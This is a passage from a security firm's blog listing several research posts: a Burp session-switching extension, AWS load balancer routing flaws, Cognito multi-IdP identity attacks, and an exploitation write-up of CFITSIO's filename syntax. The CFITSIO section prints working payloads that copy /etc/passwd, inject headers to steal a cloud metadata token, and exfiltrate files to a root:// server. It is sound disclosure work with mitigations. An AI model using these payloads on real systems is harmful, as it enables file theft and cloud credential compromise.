Doyensec's Blog

Introducing Session Switcher. Swap Burp Sessions with One Click!

2026-06-17T00:00:00+02:00

Authorization testing is one of the most repetitive, yet critical tasks in web app security testing. Checking for horizontal and vertical privilege escalation, IDORs, and other access control issues requires constantly swapping cookies and headers between different user sessions, a process that is error-prone and often becomes tedious.

Today, we’re excited to release Session Switcher, a Burp Suite extension that lets you save and switch HTTP sessions with just a couple of clicks, right from the request editor.

The Problem

During a typical authorization test, you might very often find yourself needing to to:

Copy cookies from one browser session and paste them into Repeater requests
Keep track of multiple user roles and their authentication tokens
Manually update expired JWTs or session cookies

Doing this manually a couple of times is fine, but having to repeat it multiple times across different endpoints is slow, breaks your focus, and makes it easy to mix up sessions or forget to update expired tokens, potentially leading to false positives and negatives. I don’t know about everyone else, but the number of times I’ve had to go back and replace the cookies again because I wasn’t sure whether I had copied the correct ones is more than I care to admit.

The Solution

Session Switcher adds a Sessions tab directly into Burp’s request editor where you can store named sessions (basically a set of cookies and headers) and swap between them with a single click. Instead of copying and pasting authentication data across requests, you save each user’s session once and then switch to it from a dropdown whenever you need to test a different user/role/tenant. The extension also monitors Proxy traffic and can automatically keep sessions up to date, mirroring the browser, so your stored sessions stay valid throughout the entire engagement.

How Session Switcher Works

Saving Sessions

To save a session, select any request containing the cookies and headers you want to store and click the New button in the Sessions tab of the request editor. The extension automatically extracts all cookies and uncommon headers from that request.

Switching Sessions

Once you have saved sessions, a session selector appears in the Sessions tab of the request editor. Choose a session from the dropdown and the extension instantly replaces the request’s cookies and headers with the saved ones.

This works wherever there’s an editable request editor, such as in Repeater and with intercepted Burp Proxy requests. Buttons under the selector let you Edit, Delete, or Update the selected session from the current request, or create a New one.

By default, the session list is filtered to only show sessions matching the current request’s domain, keeping things clean when you have many sessions stored.

Sessions Management Tab

The main Sessions tab lists all sessions stored in your project file, giving you a centralized view to inspect and manage all saved sessions.

Auto Update Rules

One of the most powerful features is the ability to automatically keep sessions up to date with the current state of the browser. You can define rules that monitor browser traffic going through Burp Proxy and update sessions whenever new cookies or headers are detected.

For example, you could create a rule that tracks all requests containing the X-User: alice header and automatically updates the alice session whenever the cookies change. This means you no longer have to manually update sessions when a JWT expires or you re-authenticate in the browser.

This is the simplest example, but much more complex conditions are available, such as tracking JWTs by payload. Check out the documentation for details.

Settings

If the default behavior doesn’t quite fit your workflow, the settings panel lets you tweak things like how cookies and headers are captured from requests and how they get applied when you switch sessions. Some of the options may be confusing, so make sure to check out the documentation for all the available options and what they do.

Installation

Download the latest .jar from the releases page and load it in Burp as a Java extension.

This extension will also be available on the PortSwigger BApp Store as soon as our submission is approved. Due to the current review backlog, our request has not yet been processed, even though it was submitted on April 29th, 2026.

Note: Session Switcher requires Burp Suite v2025.5 or later.

For the Future

We have a few ideas on where to take Session Switcher next:

Auto Inject rules – the counterpart to Auto Update Rules. While Auto Update monitors Burp Proxy traffic to capture sessions, Auto Inject would automatically apply a session to requests passing through Burp Proxy, letting you transparently switch the identity of your browsing session without touching individual requests.
Smarter session tracking – right now, keeping sessions up to date requires manually defining Auto Update rules. We’d like to explore ways to detect and track sessions automatically, for example by parsing login responses or monitoring for token changes, without requiring the user to configure rules upfront.
Macro-based session refresh – instead of relying on a browser to reauthenticate when a session expires, the extension could send a pre-configured request (like a login or token refresh endpoint) and parse the response to update the session automatically. This would make it possible to keep sessions alive indefinitely without any manual intervention.

These are still on the drawing board, so if any of these sound particularly useful (or if you have other ideas), let us know!

Contributing

We’d love to hear how you use Session Switcher and what could make it better for your workflow. Whether it’s a bug report, a feature idea, or just general feedback, don’t hesitate to open an issue on GitHub or reach out on social media (@Doyensec). Pull requests are also very welcome!

Comparing AI Application Security Testing Platforms

2026-05-27T00:00:00+02:00

Doyensec performed a side-by-side comparison of two leading AI-powered penetration testing platforms: Aikido’s Attack AI Pentest and XBOW’s Lightspeed in order to evaluate their abilities to properly identify vulnerabilities in modern web applications. This included manually validating all findings and classifying them as either true positives or false positives. Additionally, we looked at their overall testing process, including the configuration, impact on tested applications, quality and content of the reports, cost, and speed.

As a leading boutique application security consultancy, we were also curious about how the adoption of AI will impact the future of testing. To understand the current maturity levels of these AI platforms, it was necessary for us to put some vendors’ claims to the test.

If you’re interested in the current state of AI-powered pentesting, we encourage you to give it a read:

Comparing AI Application Security Testing Platforms: Aikido vs. XBOW (PDF, 5 MB)

Navigating Lax Load Balancers: When an Intersection Gets You Inside

2026-05-25T00:00:00+02:00

After our last episode on Multi-SSO Cognito User Pools, we are back with another issue. This time, we are looking at one of those AWS components that is everywhere and rarely questioned deeply enough: the Elastic Load Balancer.

Tidbit No. 5 - Navigating Lax Load Balancers

What is AWS ELB?

AWS Elastic Load Balancing (ELB) distributes traffic to backend services and serves as the entry point between the Internet and your applications.

It supports Layer 7 routing (Application Load Balancer - ALB) and Layer 4 routing (Network Load Balancer - NLB). It decides where traffic goes and under which conditions. ELB is commonly found fronting multiple applications, environments, and trust zones across the same infrastructure.

Why It Matters

ELB is often the first public entry point before application backends, and in many AWS environments, it also becomes part of the access-control boundary. For ALBs, listener rules do more than route traffic: they can enforce authentication with authenticate-oidc or authenticate-cognito, restrict access with source-ip conditions, and decide which target group receives a request based on host, path, headers, or other request attributes.

The simplified flow below shows how a single request can be routed through different rules depending on priority and matching conditions:

That makes the listener rule chain security-sensitive. A backend may appear protected when looking at a single rule, but still be reachable through another rule, another listener, another ALB, or a direct network path that bypasses the expected entry point.

Misconfigurations there could:

Expose backend services that were expected to be reachable only through specific hostnames, paths, or upstream controls
Allow an authentication bypass when an unauthenticated rule forwards to the same targets as an authenticated route
Bypass IP-based gates when the same target group or backend instances are reachable through another routing path without the same source-ip restriction
Bypass CloudFront-level checks when an Internet-facing origin ALB remains directly reachable

Configuration vs. Real Exposure

Standard load balancer reviews usually focus on resource level hygiene: TLS policies, access logging, deletion protection, security groups, and whether a WAF is attached. These checks are useful, but they mostly describe how the load balancer is configured, without an offensive mindset.

They do not answer the important question: what can an external request actually reach?

What usually gets missed during load balancer audits:

Routing logic issues that let traffic skip restrictive rules
Backend targets that are directly reachable regardless of what the ALB listener enforces
Real attack paths that are invisible to static config review

The Bugs

The following are some of the routing and exposure misconfigurations we encounter most often during AWS load balancer reviews. They are not the only possible ELB issues, but they are representative of a broader class of bugs where the configured routing graph does not match the intended security boundary.

1. CloudFront / WAF Bypass via Direct ALB Access

CloudFront is often placed in front of an ALB to enforce WAF rules, geo-restrictions, caching policies, or rate limiting. In this setup, the ALB is expected to behave like a private origin: users should reach it only through CloudFront, not directly.

The problem appears when the origin ALB is still Internet-facing and its security group allows public inbound traffic. In that case, an attacker could send requests directly to the ALB DNS name, bypassing every control enforced at the CloudFront layer, including WAF rules attached to the distribution.

2. Rule Shadowing

ALB listener rules are evaluated in ascending-priority order. A rule with priority 10 is evaluated before one with priority 20. If a broad rule (e.g., path /*) sits at priority 10 and a more restrictive rule (e.g., path /admin* with authenticate-oidc) sits at priority 20, all traffic to /admin matches the broad rule first. The auth action never fires.

(priority)      (condition)             (action)

[10]            path /*               → forward  → tg-app          (no auth)
[20]            path /admin*          → authenticate-oidc → tg-app  (← never reached for /admin)

This is purely an ordering bug with a direct authentication bypass impact.

3. IP Gate Bypass via Alternate ALB

A common pattern is to restrict access to an Internal backend by placing a source-ip condition on the rule:

(priority)      (condition)             (action)

[10]            source-ip 1.2.3.4/32  → forward → tg-internal-api
[default]                             → 403

That works only if the protected backend is not reachable through any other path. The issue appears when the same target group, or the same backend instances, are also registered behind another load balancer with weaker conditions.

When that alternate route exists, the source-ip gate is real, but it only protects one path to the backend. The backend remains exposed through the weaker route, where the same IP restriction is not enforced.

That demonstrates why listener rules cannot be reviewed in isolation. The key question is not only “Does this rule restrict access?” but “Is every path to these targets protected by a similar control?”

Infrastructure is not just configuration. It defines how traffic actually flows, and misconfigurations create unintended paths

Typical CSPM and audit checklists report on attributes - TLS version, logging flag, and WAF presence - but none of that tells you whether an /supposedly/protected/endpoint path is actually protected end-to-end, whether a CloudFront-fronted ALB is directly reachable, or whether the same backend instance appears in both a gated and an ungated rule.

That requires understanding the routing graph, not just the resource properties.

For Cloud Security Auditors

When reviewing an AWS account with ALBs, answer the following questions:

For each internet-facing ALB: are there any Target Group members that are also registered in a different ALB or listener with weaker (or no) conditions?
Is routing.http.xff_header_processing.mode set to preserve? If yes, does any downstream service trust X-Forwarded-For for access decisions?
Walk listener rules in priority order. For each restrictive rule (auth action, source-ip), is there a broader rule at a lower priority number that matches the same traffic first?
If a CloudFront distribution fronts an ALB, can you send HTTP or HTTPS directly to the ALB DNS and get a non-error response?
For source-ip gated rules: enumerate all paths to the gated targets - same ALB on a different port, a different ALB in the same VPC, an NLB in front of the same instances.

For Developers

When ELBs are used widely across the infrastructure for routing, authentication, or IP-based restrictions, treat the ALB listener rule chain as part of your access-control model, not just networking configuration. Priority ordering matters as much as the conditions themselves. Review it the same way you would review middleware ordering in an application framework.

Do not treat a single IP gate as complete protection for a sensitive backend. A source-ip condition only protects the route where it is enforced. If the same targets are reachable through another ALB, listener, or port without equivalent restrictions, the backend may still be exposed. Combine source-ip conditions with authentication when possible, and verify that no alternate route reaches the same targets.

Lock down security groups on ALB origins. If a CloudFront distribution fronts an ALB, the ALB’s security group inbound rules should allow only CloudFront-managed prefix lists (com.amazonaws.global.cloudfront.origin-facing), not 0.0.0.0/0.

Set routing.http.xff_header_processing.mode to append or remove on Internet-facing ALBs. If the final backend uses client IP information for access-control decisions, rate limiting, audit logging, or security monitoring, do not allow clients to control the X-Forwarded-For header value.

Tool Release: ELBaph

Some of the issues above are hard to spot by looking at a single listener or load balancer in isolation. Finding them requires correlating listeners, rules, target groups, backend instances, and reachability across the whole ELB surface. Doing this manually is time-consuming and annoying, especially in large AWS accounts with a lot of load balancers.

This is why we built doyensec/ELBaph to automate exactly this.

It is a read-only CLI tool written in Go that maps ALBs, NLBs, listeners, rules, and targets into a single routing model. It then looks for exposed paths, runs targeted HTTP/HTTPS reachability probes, and generates a structured report with the root cause, exploit path, and remediation for each finding.

It works with SecurityAudit-style read-only permissions and outputs findings live to the terminal as each check completes, alongside a JSON, Markdown, or SARIF report and an interactive topology.html that maps the full routing graph from VPC to backend targets.

# Scan a region - findings printed live, output folder created automatically
elbaph scan --region us-east-1

# Scan multiple regions using an AWS profile
elbaph scan --all-regions -p my-pentest-profile

ELBaph gave us the extra leverage needed to scale manual ELB reviews. Let us know your feedback!

Hands-On IaC Lab

We also developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/tree/main/lab-elbaph

The lab deploys two Internet-facing ALBs, a CloudFront distribution in front of the public one, and two EC2 instances running a small Go web application, showcasing a few of the misconfigurations described above.

Resources

When Filenames Become Attack Surfaces: Weaponizing NASA's CFITSIO Extended Filename Syntax

2026-05-19T00:00:00+02:00

This research was recently presented at BSides Luxembourg 2026. This blogpost documents our findings presented during the talk. The BSides slides are posted here. Today, we’re also releasing the Docker-based playground utilized for the demos so anyone interested can reproduce the findings locally: doyensec/cfitsio-efs-playground.

In our previous post on CFITSIO, we wrote about the AI-assisted fuzzing pipeline and the memory corruption issues found in its Extended Filename Syntax (EFS). This was only half of the story. We kept thinking that even without memory issues, EFS seems like a pretty powerful and rather risky feature. The EFS page is full of very interesting use cases. To quote some of them (emphasis mine):

‘rawfile.dat[i512,512]’: reads raw binary data array (a 512x512 short integer array in this case) and converts it on the fly into a temporary FITS image in memory which is then opened by the application program.

‘ftp://heasarc.gsfc.nasa.gov/test/vela.fits’: FITS files in any ftp archive site on the internet may be opened with read-only access. Files with HTTP addresses may be opened in the same way.

‘myfile.fits[EVENTS][PHA > 5]’: creates and opens a temporary FITS files that is identical to ‘myfile.fits’ except that the EVENTS table will only contain the rows that have values of the PHA column greater than 5. In general, any arbitrary boolean expression using a C or Fortran-like syntax, which may…

That surely looks promising, right?

Therefore, this post is about the next batch of findings. This time, there are no heap overflows or stack corruptions to discuss. We’ll focus on perfectly documented features, useful during file processing, but chained together to achieve some unexpected offensive primitives.

This article is not meant to criticize CFITSIO’s authors or its code. I actively use tools that depend on CFITSIO and appreciate the work behind them. What interests me here is how perfectly reasonable legacy features can become real security problems once the surrounding software and threat model change.

Extended Filename Syntax

As demonstrated, EFS is more than a mere filename parser. It is a mini-language hidden inside a filename parameter, capable of doing very interesting stuff. To understand how it works, we have to look into the source code.

When an EFS-enabled method is used, the input string eventually reaches CFITSIO’s internal ffopen() routine, which runs it through EFS parsing logic before the actual file is opened. At that stage, parts of the string may be reinterpreted as a protocol, outfile clause, extension selector, or filter expression.

The implementation is driver-based. CFITSIO keeps a table of registered backends through fits_register_driver, each associated with a prefix and a set of handler functions such as checkfile, open, create, seek, read, and write. Besides standard files, CFITSIO registers handlers for things like mem://, shmem://, http://, ftps://, and even exotic variants like ftpsmem://, ftpfile://, or ftpscompress://.

This is why EFS can seamlessly jump between local files, memory-backed files, compressed variants, and network protocols without the caller doing anything special.

Some of those drivers may implement write, create or seek methods, some may not.

 status = fits_register_driver("ftpscompress://",
            NULL,
            mem_shutdown,
            mem_setoptions,
            mem_getoptions, 
            mem_getversion,
            NULL,            /* checkfile not needed */ 
            ftps_compress_open,
            0,            /* create function not required */
            mem_truncate,
            mem_close_free,
            0,            /* remove function not required */
            mem_size,
            0,            /* flush function not required */
            mem_seek,
            mem_read,
            mem_write);

To achieve interesting primitives, we need to carefully review what’s available and what’s not.

A Tiny Lab Environment

To simplify testing and demonstrating while ensuring reproducibility, we built a minimal Docker playground around CFITSIO. The container includes a tiny helper program called fits-sample-opener. In the insecure mode, it just calls fits_open_file, performs one harmless metadata query, and exits. The helper does almost nothing on purpose. If opening a file causes a network request, a local file copy, or outbound exfiltration, that behavior comes from CFITSIO itself.

That additional metadata query is there for a reason: some EFS behaviors do not fully materialize on the initial open alone. We wanted the sample application to stay minimal while still triggering side effects like a real caller that actually inspects the file it just opened.

The full environment, including the helper program, building instructions, and the fake root:// server used later in this post, is available here.

Make sure to target the right git tag/release as EFS handling might change in the future.

Primitive 1: Arbitrary File Copy

The first surprising behavior comes from the outfile clause. EFS supports the following formula:

input.fits(output.fits)

The meaning is roughly: work on input.fits, but first save a separate copy as output.fits.

Now, let’s use our EFS playground and replace input.fits with /etc/passwd:

docker run --rm -v "$(pwd)":/workspace cfitsio:4.6.3 \
  fits-sample-opener '/etc/passwd(/workspace/foo)'

Even though /etc/passwd is not a FITS file, the copy happens before validation fails. This is an arbitrary file copy primitive. Depending on the target environment, the attack might be followed by copying sensitive files into a web-accessible or otherwise attacker-readable location, or just breaking something to achieve denial-of-service. Of course, standard OS permissions still apply.

Primitive 2: Forced Downloads and SSRF

If the filename starts with http://, https://, ftp://, or ftps://, CFITSIO will reach out to the remote resource and fetch it. The plain http:// and ftp:// paths are handled by raw socket code that has been in the tree for nearly 30 years. There was no concept of Server-Side Request Forgery back then. The TLS variants delegate to libcurl, where the request line is built by the library and is not directly attacker controlled. Either way, the same outfile clause still applies, which is what makes this interesting.

docker run --rm -v "$(pwd)":/workspace cfitsio:4.6.3 \
  fits-sample-opener 'https://example.com/anyfile(/workspace/grabbed.file)'

This causes CFITSIO to download the remote response and save it to a local path chosen by the attacker, even if the downloaded data is not valid FITS.

At that point the library becomes an SSRF gadget with persistence. It is not just “connect to a remote host”. It is “connect to a remote host, retrieve content, and write it somewhere useful on the local filesystem”.

Primitive 3: HTTP Header Injection

There might be plenty of juicy targets in the local network or on localhost. However, what SSRF is often used for these days is accesssing cloud metadata services. On a compromised cloud workload, the metadata endpoint is a common target because it hands out short-lived service-account tokens that authenticate against the rest of the cloud APIs - turning a single SSRF into broader cloud access. To mitigate basic attacks, cloud metadata services often add extra requirements. For instance, to query the GCP Metadata Service from a Compute Engine instance, you must include the header Metadata-Flavor: Google in your HTTP request and none of the CFITSIO drivers let you explicitly set custom headers.

CFITSIO’s drvrnet.c HTTP driver comes to the rescue. The request line is built with a simple snprintf call:

snprintf(tmpstr, MAXLEN, "GET %s HTTP/1.0\r\n", fn);

The fn component comes from the attacker-controlled filename and is not sanitized before being inserted into the request.

That means newline characters can be embedded into the EFS string to inject additional headers or inject entirely new requests. In practice, this turns a basic outbound request into a request-injection primitive where the attacker can reshape the final HTTP request seen by the target service. Note that we can smuggle several requests at once, but only the very first response will be processed by CFITSIO.

In our demonstrations, this was enough to reach metadata-style endpoints that expect extra headers. For example:

docker run --rm -v "$(pwd)":/workspace cfitsio:4.6.3 \
  fits-sample-opener $'http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token HTTP/1.1\nMetadata-Flavor: Google\nfoo:(/workspace/output.txt)'

The trailing foo: is not padding. We’re using it to comment out the ` HTTP/1.0\r\n piece that snprintf` always appends to our string. The metadata service simply ignores the unknown header and its value.

Primitive 4: Local File Exfiltration via `root://`

Even though we already demonstrated some file exfiltration tricks, these might not work if there is no web server or network-exposed directories.

One might think of a https://example.com/anyfile(https://attacker.com/exfil) payload to download and upload data at the same time. Unfortunately, this doesn’t work. The HTTP driver treats the outfile clause as a local destination name, not as another network URL to open. The HTTP driver also explicitly rejects write attempts.

drvrnet.c:301:

/* don't do r/w files */
  if (rwmode != 0) {
    ffpmsg("Can't open http:// type file with READWRITE access");
    ffpmsg("  Specify an outfile for r/w access (http_open)");
    goto error;
  }

Thus, we started looking for drivers capable of making web connections and sending the data out.

CFITSIO still ships support for a variant of CERN’s rootd protocol. As noted in the code:

Root protocal[sic] doesn’t have any real docs, so, the emperical docs are as follows.
First, you must use a slightly modified rootd server…

Even though we couldn’t find that slightly modified rootd server online, we reconstructed a mock server from the comments and CFITSIO’s code.

This matters because the root:// driver is not just about reading remote data. Through the outfile clause, it can also be used as an exfiltration sink. In other words, the victim process can be tricked into opening a local file and pushing it to an attacker-controlled root:// server.

There are two practical caveats, though.

First, the root:// code expects credentials. In root_openfile, it checks for ROOTUSERNAME and ROOTPASSWORD environment variables, and if they are not set it falls back to reading from stdin with fgets(). In an interactive session this often blocks and ruins the exploit.

  /* get the username */
  if (NULL != getenv("ROOTUSERNAME")) {
    if (strlen(getenv("ROOTUSERNAME")) > MAXLEN-1)
    {
       ffpmsg("root user name too long (root_openfile)");
       return (FILE_NOT_OPENED);
    }
    strcpy(recbuf,getenv("ROOTUSERNAME"));
  } else {
    printf("Username: ");
    fgets(recbuf,MAXLEN,stdin);
    recbuf[strlen(recbuf)-1] = '\0';
  }

However, many real deployments are not interactive. Containers, cron jobs, pipelines, and other batch-style environments frequently run with stdin closed or redirected to EOF. In that case fgets() returns immediately and the exploit continues.

Second, the driver wants FITS content. Exfiltrating actual FITS files can be a valid attack target, but being able to exfiltrate arbitrary files would be way more rewarding.

Fortunately, this is where EFS becomes absurdly flexible. The raw-data clause [b...] can wrap arbitrary bytes and fabricate a valid in-memory FITS object from them.

The first part of our chain, [b500,1], tells CFITSIO to stop treating the input as a normal FITS file and instead interpret the underlying bytes as raw binary image data. The b selects that raw-binary mode. The 500 is the width of the synthetic image, which in practice means “take 500 bytes per row”. If the source file is larger than that, we still get the first 500 bytes wrapped into the generated image. If it is smaller, the conversion fails and the payload needs to be adjusted. This might require a few tries but eventually we can find the right values. The trailing 1 makes the synthetic image one row high, so the result becomes a simple 500x1 FITS image rather than just an arbitrary byte stream.

The second part, [*,*], is an image-section selector. Here it simply means “select the whole generated image” rather than a sub-range. It may look redundant, but in the tested path it was useful to force CFITSIO to expose the fabricated object as a regular 2D image and move the processing forward cleanly.

In summary, the trick revolves around opening the referenced file, reinterpreting its first bytes as raw pixels, synthesizing a minimal FITS image header around them, and applying some filters. Once that transformation happens, a non-FITS local file becomes good enough for the root:// exfiltration path.

In our Docker playground, it can be reproduced with:

docker run --network=host --rm cfitsio:4.6.3 \
  fits-sample-opener '/etc/passwd(root://127.0.0.1:1094//foobar)[b500,1][*,*]'

On the host side, we used a tiny Python server that implements just enough of the legacy protocol to receive the data and print what arrived. Its full code can be found in the playground as root.py.

The server is pretty verbose. The captured output includes a fabricated FITS header followed by the first 500 bytes of /etc/passwd content.

Connection from ('127.0.0.1', 49332)
recv_message: len=4 op=ROOTD_USER payload_len=0
Username:
send_message: op=ROOTD_AUTH payload_len=4
recv_message: len=4 op=ROOTD_PASS payload_len=0
Password bytes: b''
send_message: op=ROOTD_AUTH payload_len=4
recv_message: len=19 op=ROOTD_OPEN payload_len=15
Open request: //foobar create
send_message: op=ROOTD_OPEN payload_len=4
Handshake complete; entering data loop.
recv_message: len=12 op=ROOTD_PUT payload_len=8
handle_session: received ROOTD_PUT (2005) payload=b'0 2880 \x00'
handle_session: expecting 2880 bytes for PUT data at offset 0
PUT offset=0 length=2880 preview=b'SIMPLE  =                    T / file does conform to FITS stand'...
send_message: op=ROOTD_PUT payload_len=4
recv_message: len=15 op=ROOTD_PUT payload_len=11
handle_session: received ROOTD_PUT (2005) payload=b'2880 2880 \x00'
handle_session: expecting 2880 bytes for PUT data at offset 2880
PUT offset=2880 length=2880 preview=b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/u'...
send_message: op=ROOTD_PUT payload_len=4
recv_message: len=4 op=ROOTD_FLUSH payload_len=0
handle_session: received ROOTD_FLUSH (2007) payload=b''
FLUSH requested
send_message: op=ROOTD_FLUSH payload_len=4
Connection closed while attempting to reply.
Captured file content (5760 bytes):
SIMPLE  =                    T / file does conform to FITS standard             BITPIX  =                    8 / number of bits per data pixel                  NAXIS   =                    2 / number of data axes                            NAXIS1  =                  500 / length of data axis 1                          NAXIS2  =                    1 / length of data axis 2                          EXTEND  =                    T / FITS dataset may contain extensions            COMMENT   FITS (Flexible Image Transport System) format is defined in 'AstronomyCOMMENT   and Astrophysics', volume 376, page 359; bibcode: 2001A&A...376..359H END                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin

This was a great outcome! A file exfiltration primitive, chained from a series of interesting parser quirks, that at some point started looking like exploitation building blocks.

Edge Cases and Workarounds

There is a safe route, but it is not the default one. If a program explicitly uses fits_open_diskfile or fits_open_datafile, CFITSIO opens the path literally and does not interpret EFS. Some applications do this intentionally, although in a few cases we found it was done for functional reasons rather than security awareness. For example, users were unable to open files with brackets or parentheses in their names, so the literal open routine looked like the easier fix.

Siril, an astronomical image processing tool, is such a case. While reviewing its code, we noticed that Siril had already moved away from the default EFS-aware open path and explicitly used the literal fits_open_diskfile routine instead. The motivation, however, was not a security hardening effort. It appears to have been a practical fix for user-facing parsing problems, specifically filenames containing characters that the EFS parser wanted to interpret. The relevant Siril commit references the underlying issue #475 where purely functional matters are discussed. In other words, one of the more popular open-source astrophotography tools ended up disabling the feature because it was getting in the way of normal file handling, not because EFS had been recognized as a dangerous attack surface.

Similarly, NASA’s own fitsverify tool, distributed with CFITSIO and used to verify FITS standard compliance, also moved to fits_open_diskfile in the standalone version. The release notes describe the motivation as purely functional: “This allows for file paths with special characters…that would otherwise fail”.

Hard to Fix

Memory corruption bugs reported earlier were easier to address. This class of issues is complex to mitigate given that CFITSIO is behaving as designed. Furthermore, all these filtering, transformation, and access behaviors are actively used by scientific software out there. Backward compatibility matters a lot in scientific tooling. FITS itself survives because old data must keep working, and CFITSIO grew around that reality for decades.

As with previous bugs, we prepared a security advisory summarizing the insecure designs and anti-patterns discussed here. This was shared with NASA’s HEASARC team on January 22, 2026. Each finding includes dedicated remediation suggestions, but the overall recommendation is to change the default behavior and trust boundaries, rather than remove the functionality entirely. Our pragmatic proposal is to make EFS an explicit runtime opt-in, for example via an environment variable, while preserving the current API for software that intentionally relies on it. It’s still a change, but with much less impact.

As of today, the safest mitigations for developers using CFITSIO are:

Use fits_open_diskfile or fits_open_datafile when you need to open a literal file path.
Treat EFS as a privileged feature and strictly limit where it can be used.
Apply additional filename sanitization before passing input to EFS.

In summary, if a parameter is called a filename but behaves like a small programming language, it deserves to be threat-modeled like one.

The Danger of Multi-SSO AWS Cognito User Pools

2026-05-05T00:00:00+02:00

After a small detour, the CloudSecTidbits series is back with new episodes. We had the opportunity to present them at the first DEFCON in Singapore few days ago during our DemoLabs sessions. Meeting Singapore’s community was indeed amazing - thanks again for having us!

From the Previous Episodes

CloudSec Tidbits is a blogpost series showcasing interesting bugs found by Doyensec during cloud security testing activities.

We focus on vulnerabilities resulting from an insecure combination of web and cloud related technologies.

Every article includes an Infrastructure as Code (IaC) laboratory that can be easily deployed to experiment with the described vulnerability.

Time to get ready and dive into a new tidbit.

Tidbit No. 4 - The Danger of Multi-SSO User Pools

What is AWS Cognito? If you need a refresher, you can start by reading the initial AWS Cognito introduction we did back in S1 Ep.2, Tampering User Attributes In AWS Cognito User Pools.

This time we leave simple setups behind and walk through the kind of multi-tenant Cognito deployment that is becoming the SaaS default: one User Pool, many tenants, and each tenant bringing “their” external IdP.

AWS Cognito Multi-SSO Flows

With Cognito User Pools, developers can register multiple external IdPs (OIDC and SAML) against a single pool and expose them via the hosted UI (managed login page), or via a custom login page that still hits the hosted SSO endpoints.

External IdPs are registered through the CreateIdentityProvider API. A minimal OIDC registration looks like this:

Of course, such a creation is typically made by the backend of the platform supporting custom IdP settings for its tenants.

Introducing a New Actor, AWS Lambda Triggers Primer

Triggers are synchronous hooks that allow developers to embed custom logic into event-driven flows.

When it comes to Cognito, the service invokes multiple triggers at specific stages of user creation and authentication through SSO. They stop the SSO authentication flow and allow custom logic to accept, reject, or modify it. In a normal implementation, they end up carrying all the “identity glue” required by the platform to be coherent with its other identity constraints: domain allowlists and ownership checks, tenant restrictions, JIT provisioning, attribute normalization, token shaping and so on.

The clearest way to think about it is by mapping the SSO triggers execution order and event types. Below you can find our go-to boundary guide for identity checks within the numerous triggers.

The main takeaways from a security perspective are:

The PreSignup trigger is the only gate before the actual user object creation in the Cognito User Pool. Any identity landed in the pool could be interacted with by exploiting other features in the platform
First federated sign-in and subsequent sign-in execution ordering only share the TokenGeneration trigger. Any authentication constraint applied only in one of the two chains might allow full authentication in the other
Once the user is created in the pool, there is no automatic rollback mechanism; cleanup must be handled manually
Federated sign-in does not invoke any other custom authentication challenge, migrate user, custom message, or custom sender triggers in your user pool

What if the IdP Is Malicious? Full Flow Example

In the example below we see what happens when an external OIDC IdP is involved, Cognito performs a full OIDC code flow, fetching /userinfo, and merging claims according to the setup defined at creation.

The high-resolution SVG file can be downloaded here.

A malicious IdP could attack the platform relying on the multi-SSO Cognito User Pools in different ways, depending on constraints and the complex identity logic embedded in it.

Now we have everything: an extra injection point as malicious IdP talking to AWS Cognito, a set of complex triggers gluing together the labyrinth of identity constraints.

Let’s go through the possible anti-patterns that might introduce bugs:

1. JIT Ghost Identity Injection: Sometimes Landing Is Enough

As mentioned before, the trigger PreSignUp_ExternalProvider is the only one that fires before Cognito has persisted the user record in the pool.

Getting a ghost identity is straightforward most of the time:

Register a malicious OIDC server as an IdP (EvilCorp) using the self-service SSO config page
Federate with an attacker@company.com email
PreSignUp_ExternalProvider fires and does not include the domain check, hence Cognito persists the user record
PostConfirmation (the JIT provisioning Lambda) fires and the domain check throws, the session is blocked but the user record stays. PreAuthentication is configured with the same check too, but SSO is not the only way to interact with a user

From that point, even if there are rollback mechanisms that will delete it, you have an operational window where it is possible to abuse other features of the platform and interact with such identity. Worst case scenarios include a forceful password reset to gain non-SSO auth capability, impersonation of a user to get direct session and so on.

Tip: Weird escapes and other means of injections in other fields could lend you a vast range of vulnerabilities. Always review the components reading the identity object as a whole.

2. Trigger Source Values: Forgotten Events

Cognito distinguishes creation and authentication paths through multiple event.triggerSource values. The triggerSource is the named info given to the custom handlers to understand the identity event and act consequently.

There are many values, some might get lost or misinterpreted by developers, introducing vulnerabilities.

The core values relevant to any multi-SSO security review are:

triggerSource	When it fires / security risk
`InboundFederation_ExternalProvider`	fires before the user record is written on every federated sign-in, for new and returning users; skipping it means attribute checks fall to `PreSignUp`, which only fires on the first login
`PreSignUp_ExternalProvider`	fires when a first federated login would create a local user; missing id checks in it allow durable ghost identity
`PreSignUp_AdminCreateUser`	Usually fires on admin / SCIM creation paths
`PostConfirmation_ConfirmSignUp`	fires after confirmation, including auto-confirm on first federated login; cannot prevent user creation, only acts on an already-persisted record
`PreAuthentication_Authentication`	fires on subsequent logins only; does not fire on first federated login, so placing checks only there leaves first-login unprotected
`PostAuthentication_Authentication`	fires after every successful authentication but cannot block the session; detection and audit hook only, not a security gate
`TokenGeneration_Authentication`	fires on SDK/admin auth; different source from `HostedAuth`, logic applied to one is silently absent on the other

The complete reference with every possible triggerSource lives in the Lambda triggers documentation.

3. Federated Username Format & the Sub-Splitting Attack

Cognito’s internal identity key for federated users is not the email, it is:

<ProviderName>_<sub>

This appears as event.userName in triggers and as cognito:username in tokens. ProviderName is the IdP name registered in the pool and sub is the IdP subject identifier (attacker-controlled if the IdP is malicious).

Provider Collision: Case and Homoglyph

Cognito enforces uniqueness on byte-equal ProviderName, but two IdPs whose names are visually similar but byte-distinct are accepted in the same pool.

As an example:

